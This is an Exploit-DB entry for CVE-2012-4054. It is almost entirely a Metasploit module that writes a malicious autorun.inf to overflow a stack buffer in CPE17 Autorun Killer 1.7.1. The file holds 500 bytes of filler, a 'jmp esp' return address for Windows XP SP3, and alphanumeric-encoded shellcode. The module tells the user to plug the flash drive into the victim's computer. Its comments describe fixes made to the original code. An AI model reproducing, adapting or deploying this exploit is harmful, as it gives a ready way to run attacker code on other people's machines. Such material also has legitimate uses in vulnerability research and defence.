CPE17 Autorun Killer <= 1.7.1 - Stack Buffer Overflow Exploit

2012-04-27T00:00:00
ID EDB-ID:18792
Type exploitdb
Reporter Xenithz xpt
Modified 2012-04-27T00:00:00

Description

CPE17 Autorun Killer <= 1.7.1 - Stack Buffer Overflow Exploit. CVE-2012-4054. Local exploit for the Windows platform (a malicious autorun.inf is delivered on removable media; see FILENAME below).

                                        
                                            #
# CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit
# by Xelenonz

require 'msf/core'

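class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::FILEFORMAT

  # Module metadata.
  #
  # The malicious file is written under FILENAME (default autorun.inf). The
  # payload is alphanumeric-encoded once, with ESP as the decoder's buffer
  # register, because the return address used below is a 'jmp esp': at decoder
  # entry ESP points at the shellcode. The original module asked the framework
  # for an ECX-based decoder here and then re-encoded payload.encoded a second
  # time for ESP in #exploit; both the register mismatch and the double
  # encoding are removed.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit',
      'Description'    => %q{
        This module creates an autorun.inf file that triggers a stack buffer
        overflow in CPE17 Autorun Killer <= 1.7.1 when the file is read (the
        original author attributes it to the readfile function). The saved
        return address is overwritten with a 'jmp esp' gadget and execution
        lands in the alphanumeric-encoded payload placed directly after it.
      },
      'Author'         => [ 'Xelenonz' ],
      'Version'        => '0.1',
      'References'     =>
        [
          [ 'CVE', '2012-4054' ],
        ],
      'Payload'        =>
        {
          'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
          # Must match the register that holds the buffer address when the
          # decoder stub runs; after 'jmp esp' that register is ESP, not ECX.
          'EncoderOptions' => { 'BufferRegister' => 'ESP' },
        },
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => 'true',
        },
      'Platform'       => 'windows',
      'Targets'        =>
        [
          [
            'Windows XP SP3',
            {
              'Ret'    => 0x775a676f, # jmp esp (from the original module; tied to that OS/DLL build)
              'Offset' => 500,        # bytes of filler before the saved return address
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false
    ))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'autorun.inf' ]),
      ], self.class)
  end

  # Build and write the malicious file.
  #
  # Layout: target['Offset'] bytes of filler, the 'jmp esp' address packed
  # little-endian, then the payload. payload.encoded is already
  # alphanumeric-encoded for ESP per the 'Payload' info above, so it is used
  # as-is rather than being run through the encoder again.
  def exploit
    buffer = ''
    buffer << 'A' * target['Offset']      # filler up to the saved return address
    buffer << [ target.ret ].pack('V')    # overwrite EIP with jmp esp (little-endian)
    buffer << payload.encoded             # alphanumeric payload, ESP-relative decoder

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(buffer)
    print_status("Plug flashdrive to victim's computer")

    # Kept from the original module. With DisablePayloadHandler set in
    # DefaultOptions this is not expected to start a listener here — confirm.
    handler
  end
end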